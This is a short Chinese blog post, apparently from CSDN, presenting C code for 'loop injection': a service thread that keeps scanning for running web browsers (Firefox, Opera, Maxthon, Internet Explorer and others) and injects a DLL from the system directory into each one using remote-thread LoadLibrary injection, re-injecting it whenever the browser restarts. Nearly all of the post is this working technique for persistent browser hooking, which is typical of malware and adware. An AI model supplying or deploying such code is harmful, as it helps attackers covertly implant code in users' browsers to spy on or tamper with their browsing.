来源:http://blog.csdn.net/brain_/
我在写注入程序的时候,偶尔遇见过一些邪门儿的问题,比如挂在explorer上面不能运行,挂在其他的进程上面却很正常,为了能尽快地解决问题,
一种循环注入的思路
。我就犯懒设计了这个东西。因此也就不用怕由于进程的终止而导致dll文件的卸载:DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
DWORD dwThreadID,pID,pPriID;
void *pRemoteThread;
HANDLE hProcess,hThread;
char pszLibFileName[MAX_PATH];
GetSystemDirectory(pszLibFileName,MAX_PATH);
strcat(pszLibFileName,"\\library.dll");
int cb = (1 + lstrlenA(pszLibFileName)) * sizeof(WCHAR);
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
EnableDebugPriv();
/*
maxthon.exe
firefox.exe
opera.exe
ttraveler.exe
*/
char *szBrowserName[5]=
{
"maxthon.exe",
"firefox.exe",
"opera.exe",
"ttraveler.exe",
"iexplore.exe"
};
do
{
for(int i=0;i<5;i++)
{
pID = GetPidByName(szBrowserName[i]);
if(pID != 0)
i = 5;
}
if(pID == 0)
{
hThread = NULL;
}
else if((pID != 0)&&(hThread == NULL))
{
pPriID = pID;
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
if(!hProcess)
return 0;
pRemoteThread = VirtualAllocEx(hProcess,
NULL,
cb,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if(!pRemoteThread)
return 0;
if(!WriteProcessMemory(hProcess, pRemoteThread,
(PVOID)pszLibFileName,
cb,
0))
return 0;
hThread = CreateRemoteThread(hProcess ,
NULL,
0,
pfnStartAddr,
pRemoteThread,
0,
&dwThreadID);
CloseHandle(hProcess);
}
else if((pID != 0)&&(hThread != NULL)&&(pPriID!=pID))
hThread = NULL;
Sleep(100);
}
while(dwCurrState != SERVICE_STOP_PENDING && dwCurrState != SERVICE_STOPPED);
return 0;
}
这种模式能确保挂接的dll文件不会因为进程终止而卸载